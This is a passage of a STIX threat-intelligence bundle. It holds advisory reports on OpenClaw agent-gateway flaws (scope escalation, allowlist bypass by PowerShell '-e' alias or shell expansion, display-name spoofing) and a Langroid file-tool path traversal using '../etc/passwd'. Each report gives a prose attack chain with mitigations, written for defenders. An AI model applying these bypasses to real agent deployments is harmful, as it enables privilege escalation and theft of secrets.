affected system. While the authority is temporary (lasting until the connection closes or revalidates), it provides a window for attackers to cause significant damage. The vulnerability specifically targets deployments utilizing `gateway.auth.mode: \"trusted-proxy\"`, making environments relying on this mode susceptible to privilege escalation.\n\n## Recommendation\n\n*   Upgrade all OpenClaw installations to version `openclaw@2026.5.18` or later to patch the vulnerability as stated in the source.\n*   Before upgrading, restrict trusted-proxy Control UI access to only those users who are genuinely authorized for the scopes they are permitted to request.\n*   Restart the OpenClaw gateway after implementing any changes to the trusted-proxy authorization policy to ensure the new policies are active.\n",
      "published": "2026-07-03T12:03:27Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "websocket",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qjpc-qf9m-xwmr"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--776efcf2-7132-50e8-acec-54d4b20fef63",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a618a1c0-c9c2-510a-8c60-2cccdaec4825",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5dd479c4-0269-56ca-8b97-efa4daade52a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a618a1c0-c9c2-510a-8c60-2cccdaec4825",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a618a1c0-c9c2-510a-8c60-2cccdaec4825",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw's POSIX Node system.run Safe-Bin Widened by Shell Expansion (GHSA-mhq8-78pj-5j79)",
      "description": "## Overview\n\nA high-severity vulnerability (GHSA-mhq8-78pj-5j79) has been identified in OpenClaw's `system.run` functionality on POSIX nodes, impacting versions prior to `2026.5.18`. The issue arises when the `system.run` command, configured with safe-bin or allowlist-based auto-approval, processes commands where shell expansion can occur. This can lead to a scenario where an argument that appears safe to the policy engine transforms into a file operand after shell expansion, allowing a lower-privilege authenticated operator to read sensitive node-local files unintended by policy. This policy-enforcement gap could be exploited to exfiltrate OpenClaw configuration data or other confidential information stored locally on the node. The vulnerability is specifically limited to paired POSIX node execution and does not represent an unauthenticated node takeover.\n\n## Attack Chain\n\n1.  An authenticated operator, potentially with lower privileges, initiates a `system.run` command on a paired POSIX node.\n2.  The `system.run` command is configured with a safe-bin or allowlist-style auto-approval policy.\n3.  The operator crafts the command to include parameters susceptible to shell expansion (e.g., variable substitution, wildcard expansion).\n4.  The OpenClaw safe-bin check approves the command based on its initial interpretation, before shell expansion.\n5.  During execution, the shell processes the command, and its expansion alters the original interpretation of the approved command.\n6.  A seemingly safe argument, intended for an approved binary, expands into additional shell words, one of which becomes an unintended file operand to the executed binary.\n7.  The executed binary reads a sensitive node-local file (e.g., OpenClaw configuration files, sensitive data) that the operator would otherwise not have authorization to access.\n8.  The content of the sensitive node-local file is exposed to the lower-privilege operator flow, bypassing the intended security policy.\n\n## Impact\n\nSuccessful exploitation of this vulnerability could lead to the unauthorized disclosure of sensitive information from affected OpenClaw POSIX nodes. A lower-privilege operator could read node-local files, including OpenClaw configuration data, API keys, credentials, or other proprietary information. This is a policy-enforcement gap in argument validation, meaning that while the command itself was approved, its post-expansion execution deviates from the intended secure behavior. The extent of the damage depends on the sensitivity of the files accessible by the node process, potentially exposing critical infrastructure details or allowing further lateral movement if credentials are leaked.\n\n## Recommendation\n\n*   Upgrade to OpenClaw version `openclaw@2026.5.18` or later to remediate the vulnerability (GHSA-mhq8-78pj-5j79).\n*   Review existing `system.run` policies to avoid broad safe-bin auto-approval for commands that can read arbitrary paths.\n*   Prefer explicit approval for node commands that interact with local files, scrutinizing any parameters that could be subject to shell expansion.\n",
      "published": "2026-07-03T12:15:00Z",
      "labels": [
        "vulnerability",
        "policy-bypass",
        "posix",
        "data-exposure"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mhq8-78pj-5j79"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d750dd2-9512-5f02-b90d-ca6edee1ef48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--42006023-db54-56f4-b0ce-94a53cfb4aba",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--42006023-db54-56f4-b0ce-94a53cfb4aba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Scoped Chat Route Inheritance Could Bypass Admin Command Scope Gates",
      "description": "## Overview\n\nA high-severity vulnerability has been identified in OpenClaw that enables privilege escalation for certain scoped Gateway clients. Specifically, a `chat.send` request, when delivered through an inherited external route, can be incorrectly evaluated as an external-channel command while retaining the lower Gateway client scopes. This flaw affects OpenClaw deployments where a scoped Gateway caller with `operator.write` permissions can send commands into sessions utilizing external delivery routes. This bypasses security checks that typically require higher `operator.approvals` or `operator.admin` scopes for critical administrative functions. The vulnerability impacts versions prior to `2026.5.18` and allows for unauthorized execution of plugin, config, MCP, allowlist, and ACP mutations.\n\n## Attack Chain\n\n1.  An attacker obtains or leverages existing `operator.write` privileges within a scoped Gateway client in an OpenClaw deployment.\n2.  The attacker crafts a malicious `chat.send` request targeting administrative functions (e.g., plugin, config, MCP, allowlist, or ACP mutations).\n3.  The crafted `chat.send` request is intentionally delivered into a session that possesses an inherited external delivery route.\n4.  The OpenClaw system evaluates this specific request path as an external-channel command, despite originating from a scoped Gateway client.\n5.  During this evaluation, the request erroneously retains the lower `operator.write` client scopes, rather than requiring the higher `operator.approvals` or `operator.admin` scopes mandated for the targeted administrative commands.\n6.  The administrative command is executed with insufficient privileges, bypassing the intended security scope gates and achieving privilege escalation within the OpenClaw environment.\n\n## Impact\n\nThe successful exploitation of this vulnerability allows an attacker with only `operator.write` permissions to execute commands that should explicitly require higher `operator.approvals` or `operator.admin` scopes. This includes critical administrative commands related to plugin management, configuration changes, Message Control Protocol (MCP) modifications, allowlist adjustments, and Access Control Policy (ACP) mutations. Such unauthorized execution can lead to severe system compromise, data manipulation, unauthorized access, and potentially full control over the OpenClaw instance, undermining the integrity and security posture of the platform.\n\n## Recommendation\n\n*   Upgrade all OpenClaw instances to version `openclaw@2026.5.18` or later immediately to patch the vulnerability.\n*   Review and restrict `operator.write` token grants: Avoid granting `operator.write` tokens to clients that can deliver commands into sessions with external routes unless those clients are explicitly trusted with admin-like command effects.\n",
      "published": "2026-07-03T12:14:04Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "openclaw",
        "application-security"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-hw9r-h9mr-4jff"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cf0b88b5-38df-510c-b2e3-4a991b8ecbce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Matrix allowFrom Vulnerability (CVE-2026-53811)",
      "description": "## Overview\n\nA significant vulnerability, tracked as CVE-2026-53811, has been identified in OpenClaw's Matrix `allowFrom` feature, affecting versions up to `2026.5.6`. This flaw allows a Matrix account with the ability to change its display name to bypass security policies by having its mutable display metadata match an entry in an allowlist. This misconfiguration can lead to unauthorized agent access, where permissions intended for a legitimate Matrix identity are mistakenly granted to an attacker-controlled account. The issue arises when the affected feature is enabled and reachable, particularly when lower-trust input can influence the path that leads to policy matching. While this vulnerability does not alter OpenClaw's trusted-operator model, its practical impact is highly dependent on the operator's specific configuration and the sensitivity of the agent access granted.\n\n## Impact\n\nWhen this vulnerability is present and actively exploited, and the affected feature is enabled and reachable by untrusted input, it could allow an attacker to gain unauthorized agent access that was intended for a different, legitimate Matrix identity. The practical severity of this impact is directly tied to an organization's specific configuration of OpenClaw, the types of agents and permissions managed by the vulnerable `allowFrom` feature, and whether lower-trust users or external inputs can interact with this path. Successful exploitation could lead to data compromise, unauthorized operations, or broader system access, depending on the privileges associated with the hijacked agent identity.\n\n## Recommendation\n\n*   **Patch CVE-2026-53811 immediately:** Upgrade all instances of `npm/openclaw` to version `2026.5.7` or newer to remediate CVE-2026-53811.\n*   **Implement policy hardening:** Until patching is complete, configure allowlists using stable Matrix user IDs (e.g., `@user:matrix.org`) instead of mutable display names.\n*   **Restrict access:** Review and narrow channel and tool allowlists to the absolute minimum necessary.\n*   **Isolate environments:** Avoid sharing a single OpenClaw Gateway between mutually untrusted users or departments.\n*   **Disable unnecessary features:** Disable the `allowFrom` feature if it is not explicitly required for operational purposes, removing the attack surface for CVE-2026-53811.\n",
      "published": "2026-07-03T12:13:27Z",
      "labels": [
        "vulnerability",
        "matrix",
        "openclaw",
        "npm"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7hxm-f538-3xp6"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6decfdd7-53b0-5396-99bd-c97263b72c2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--432017f8-36ab-5454-baf8-e314fcc2fdd0",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b9ebcd6-1a9e-555d-bfdd-8e3476ee39e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--432017f8-36ab-5454-baf8-e314fcc2fdd0",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--432017f8-36ab-5454-baf8-e314fcc2fdd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw PowerShell Encoded-Command Alias Bypass Vulnerability",
      "description": "## Overview\n\nA critical vulnerability (GHSA-j472-gf56-x589) has been identified in the npm/openclaw package, affecting versions up to `2026.5.7`. This flaw allows PowerShell encoded-command aliases to circumvent security allowlist checks within the OpenClaw application. Specifically, when an attacker provides crafted input containing PowerShell commands with abbreviated encoded-command flags, the OpenClaw allowlist parser fails to recognize these alias forms, permitting the execution of unvetted PowerShell content. This bypass poses a significant risk to organizations using OpenClaw, as it enables unauthorized code execution on the underlying Windows operating system, potentially leading to system compromise, data exfiltration, or further network penetration if the affected feature is enabled, reachable by lower-trust input, and improperly configured.\n\n## Attack Chain\n\n1.  **Crafted Input Delivery**: An attacker identifies an enabled and reachable OpenClaw feature that accepts command requests.\n2.  **Payload Injection**: The attacker sends a crafted input to this feature, embedding PowerShell commands that utilize abbreviated encoded-command flags (e.g., `-e` instead of `-EncodedCommand`).\n3.  **Allowlist Bypass**: OpenClaw's internal allowlist parser, designed to vet PowerShell commands, fails to properly recognize the abbreviated alias form of the encoded command flags.\n4.  **Unvetted Command Execution**: Due to the parsing failure, the embedded encoded PowerShell content bypasses the intended security allowlist checks.\n5.  **PowerShell Process Launch**: OpenClaw executes the unvetted, encoded PowerShell command on the underlying Windows operating system.\n6.  **Code Execution**: The malicious PowerShell script performs attacker-defined actions, such as downloading and executing additional malware, establishing persistence, or exfiltrating sensitive data.\n7.  **Impact Achieved**: The attacker gains unauthorized code execution capabilities within the OpenClaw environment and potentially on the host system.\n\n## Impact\n\nThe successful exploitation of this vulnerability can lead to unauthorized arbitrary code execution on the underlying Windows operating system hosting the OpenClaw application. The practical impact is highly dependent on the specific configuration of the OpenClaw instance and whether lower-trust or untrusted input sources can reach the vulnerable features. If an attacker can leverage this bypass, they could potentially compromise the entire host system, exfiltrate sensitive data processed by OpenClaw, or establish a foothold for further attacks within the organization's network. There are no specific victim counts or targeted sectors mentioned, but any organization using vulnerable versions of OpenClaw configured with reachable features accepting external input is at risk.\n\n## Recommendation\n\n*   Upgrade the `npm/openclaw` package to version `2026.5.12` or later immediately to patch the vulnerability.\n*   As a temporary mitigation, avoid allowlisting PowerShell wrapper forms and require explicit approval for any encoded PowerShell commands until patching is complete.\n*   Disable the affected OpenClaw features entirely if they are not strictly needed, reducing the attack surface.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect suspicious PowerShell encoded command execution on Windows hosts where OpenClaw is deployed.\n*   Enable comprehensive logging for PowerShell activity, including script block logging and module logging, to enhance visibility for the detection rule.\n",
      "published": "2026-07-03T12:12:38Z",
      "labels": [
        "vulnerability",
        "code-execution",
        "powershell",
        "bypass",
        "openclaw",
        "npm",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-j472-gf56-x589"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7be3fe71-867b-5ced-81bb-ff1179651351",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e40c406-65d8-5374-818c-6f395dccc93a",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e8f4bfa1-ac5d-516a-a42f-fb59df63d36b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e40c406-65d8-5374-818c-6f395dccc93a",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70e8b1a9-2b2a-5915-8442-286c0bef45cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9e40c406-65d8-5374-818c-6f395dccc93a",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9e40c406-65d8-5374-818c-6f395dccc93a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Langroid File Tools Path Traversal Vulnerability (CVE-2026-50181)",
      "description": "## Overview\n\nA significant path traversal vulnerability, tracked as CVE-2026-50181, has been identified in Langroid's `ReadFileTool` and `WriteFileTool` components, affecting all versions up to and including 0.63.0. The vulnerability stems from the tools' failure to properly validate and enforce path boundaries after changing the process working directory to a `curr_dir` (current directory). While the tools intend to restrict file operations to this `curr_dir`, they do not resolve the user-supplied `file_path` to ensure it remains within this boundary. This oversight allows an attacker to use path traversal sequences, such as `../`, within the `file_path` argument to access files located outside the intended `curr_dir`. The impact is particularly critical for applications that expose these file tools to user-controlled input, Large Language Model (LLM) agents, or delegated coding/documentation agents, as it can lead to unauthorized reading of sensitive files (e.g., secrets, configuration files) or modification of arbitrary files, compromising data confidentiality and integrity. The issue is present in `langroid/agent/tools/file_tools.py` and `langroid/utils/system.py`.\n\n## Attack Chain\n\n1.  **Identify Vulnerable Application:** An attacker identifies an application that integrates Langroid and exposes its `ReadFileTool` or `WriteFileTool` in a way that allows user-controlled input to influence the `file_path` argument (e.g., via an LLM agent interface or a user-facing API).\n2.  **Craft Malicious Path:** The attacker crafts a `file_path` argument containing path traversal sequences, such as `../`, to reference a file outside the intended sandbox or working directory (e.g., `../etc/passwd` for reading, or `../malicious_script.sh` for writing).\n3.  **Invoke Vulnerable Tool:** The attacker sends the crafted `file_path` as input to the application, which then passes it directly to an instance of `ReadFileTool` or `WriteFileTool`.\n4.  **Directory Change (Internal):** Internally, the Langroid tool changes the process's current working directory to the configured `curr_dir` (e.g., `/var/app/sandbox/`).\n5.  **Unvalidated Path Resolution:** The tool then proceeds to open or create the file using the provided `file_path` argument. Due to the lack of proper validation, the `../` sequences are honored, causing the path to resolve outside the `curr_dir` (e.g., `/var/etc/passwd`).\n6.  **Execute Unauthorized File Operation:** The Langroid tool performs the requested operation (read or write) on the arbitrarily resolved file path outside the intended boundary.\n7.  **Information Disclosure / Data Modification:** If `ReadFileTool` was used, the contents of the sensitive file are disclosed to the attacker. If `WriteFileTool` was used, the attacker can modify or create arbitrary files, potentially leading to further compromise, persistence, or data integrity violations.\n\n## Impact\n\nThis vulnerability can severely impact applications that enable Langroid's file tools and rely on the `curr_dir` parameter to establish a secure sandbox, project, or workspace boundary. If exploited, an attacker can read files outside the intended workspace, leading to the exposure of sensitive local secrets, configuration files, source code, environment files, or other critical project-adjacent data. Conversely, by exploiting `WriteFileTool`, an attacker could modify or create arbitrary files outside the designated project directory, which could lead to code injection, defacement, or disruption of services. The severity of the impact is contingent on how the Langroid file tools are exposed and the nature of the application's file system structure.\n\n## Recommendation\n\n*   **Patch CVE-2026-50181:** Upgrade the Langroid library to a version patched for CVE-2026-50181 immediately.\n*   **Implement Path Validation:** For applications using Langroid file tools, implement robust path validation logic before passing any user-controlled or LLM-generated `file_path` arguments to `ReadFileTool` or `WriteFileTool`. Ensure all resolved paths remain strictly within the intended `curr_dir`.\n*   **Review `curr_dir` Usage:** Audit all instances where `ReadFileTool` and `WriteFileTool` are used, verifying that the `curr_dir` is correctly configured and that no sensitive files are reachable via path traversal from this directory.\n",
      "published": "2026-07-03T12:11:45Z",
      "labels": [
        "path-traversal",
        "python-library",
        "vulnerability",
        "llm-agent"
      ],
      "object_refs": [
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-fg23-3346-88f5"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/user-attachments/files/28333958/Langroid.CVE.Report.pdf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f46cbdd-6ace-5a6b-9bf8-9c2551c982af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--02103125-c3bf-54bf-ac62-3b5fafafb1f4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--02103125-c3bf-54bf-ac62-3b5fafafb1f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Node Pairing Vulnerability Leads to Privilege Escalation",
      "description": "## Overview\n\nA critical vulnerability exists in OpenClaw, specifically affecting versions prior to `2026.5.27`. This flaw, described as \"Node pairing reconnection could confuse approval scope state,\" permits an already paired or reconnecting node session to manipulate its pairing state, altering the approval scope decision within the OpenClaw Gateway. This could result in a node being granted significantly broader authority than intended by the authenticated operator, effectively leading to privilege escalation. The vulnerability does not negate OpenClaw's trusted-operator model but targets scenarios where lower-trust input can reach the affected path during node reconnection. Defenders must prioritize patching to version `2026.5.27` or later to mitigate this risk and prevent potential unauthorized access or elevated privileges.\n\n## Attack Chain\n\n1.  An attacker, having established initial access or control over a low-privilege OpenClaw node, prepares to exploit the reconnection mechanism.\n2.  The attacker initiates a manipulated node reconnection session with the OpenClaw Gateway.\n3.  During the reconnection process, the attacker leverages the vulnerability in OpenClaw versions older than `2026.5.27`.\n4.  The Gateway's internal state machine processes the manipulated reconnection, causing confusion in the node's pairing approval scope.\n5.  This confusion leads the Gateway to make an incorrect \"approval scope decision\" for the reconnecting node.\n6.  As a result, the node is granted \"broader node authority\" and elevated privileges beyond the operator's original intent.\n7.  The attacker can now execute unauthorized commands or access sensitive resources with the newly acquired elevated privileges within the OpenClaw environment.\n\n## Impact\n\nWhen the affected OpenClaw feature is enabled and reachable, this vulnerability could restore or present broader node authority than the operator originally intended. The practical impact is contingent on the operator's specific configuration and whether lower-trust input can successfully reach the vulnerable code path. If exploited, an attacker could gain unauthorized access to functions or data previously restricted, leading to data compromise, system manipulation, or further lateral movement within the compromised environment.\n\n## Recommendation\n\n*   Patch all OpenClaw instances to version `2026.5.27` or later immediately to remediate the vulnerability mentioned in the GHSA-83w9-h5wv-j9xm reference.\n*   Revoke any unexpected or suspicious node pairings and re-pair only explicitly trusted nodes as a hardening measure until patching is complete.\n*   As a general hardening practice, keep channel and tool allowlists as narrow as possible.\n*   Avoid sharing a single OpenClaw Gateway between mutually untrusted users or applications.\n*   Disable the affected node pairing feature when it is not actively required for operations.\n",
      "published": "2026-07-03T12:06:06Z",
      "labels": [
        "privilege-escalation",
        "vulnerability",
        "npm",
        "openclaw"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-83w9-h5wv-j9xm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ce0996ad-ccff-5a96-b8c9-29a1a8f4d7f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5a48c240-c75b-5257-93c1-27490c94b570",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5a48c240-c75b-5257-93c1-27490c94b570",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenClaw Slack allowFrom Vulnerability (GHSA-c29c-2q9c-pc86)",
      "description": "## Overview\n\nThe OpenClaw project has disclosed a high-severity vulnerability (GHSA-c29c-2q9c-pc86) in its `allowFrom` feature, which facilitates integration with Slack. This flaw, present in `npm/openclaw` versions up to `2026.5.3-1`, allows a malicious Slack account to gain unintended agent access within OpenClaw. The vulnerability hinges on OpenClaw incorrectly binding policy entries to mutable Slack display names rather than stable user IDs. An attacker can manipulate their display name to impersonate another identity specified in an OpenClaw allowlist, thereby gaining unauthorized access. This is particularly critical for organizations using OpenClaw Gateways where this feature is enabled and where lower-trust input could influence access paths. The vulnerability does not alter OpenClaw's trusted-operator model but highlights the importance of configuration best practices.\n\n## Attack Chain\n\n1. An attacker controls a Slack account that interacts with an OpenClaw Gateway instance.\n2. The OpenClaw Gateway is configured with the `allowFrom` feature enabled, relying on Slack display names in its access policies or allowlists.\n3. The attacker modifies their Slack account's display name metadata to precisely match the display name of a legitimate, higher-privileged identity specified in an OpenClaw allowlist.\n4. The attacker's Slack account initiates a request or interaction with the vulnerable OpenClaw Gateway.\n5. Due to the vulnerability (GHSA-c29c-2q9c-pc86), OpenClaw's `allowFrom` feature incorrectly resolves the attacker's mutable display name against its internal allowlist policy.\n6. The OpenClaw Gateway grants the attacker's Slack account agent access, mistakenly believing it is the legitimate, authorized user.\n7. The attacker leverages this unintended agent access to perform unauthorized actions or gain further access within the OpenClaw environment, such as data exfiltration or command execution.\n\n## Impact\n\nThe successful exploitation of this vulnerability could lead to a malicious Slack account receiving agent access within OpenClaw that was intended for another, legitimate Slack identity. The practical severity of this impact is highly dependent on the operator's specific OpenClaw configuration, particularly whether the `allowFrom` feature is enabled, reachable, and if lower-trust input can influence its access decisions. While no specific victim counts or industry sectors are mentioned, organizations relying on OpenClaw for automated tasks and integrations could face unauthorized data access, command execution, or other actions enabled by the compromised agent's permissions.\n\n## Recommendation\n\n- Immediately patch `npm/openclaw` to version `2026.5.3` or later to remediate the vulnerability.\n- Review and update OpenClaw allowlist configurations to use stable Slack user IDs instead of mutable display names, as suggested by the `Mitigations` section in the advisory.\n- Keep channel and tool allowlists as narrow as possible to minimize potential attack surface, as indicated in the `Mitigations` section.\n- Avoid sharing a single OpenClaw Gateway instance between mutually untrusted users or processes.\n- Disable the affected `allowFrom` feature when it is not strictly necessary for operational requirements.\n",
      "published": "2026-07-03T12:04:25Z",
      "labels": [
        "vulnerability",
        "supply-chain",
        "cloud",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-c29c-2q9c-pc86"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
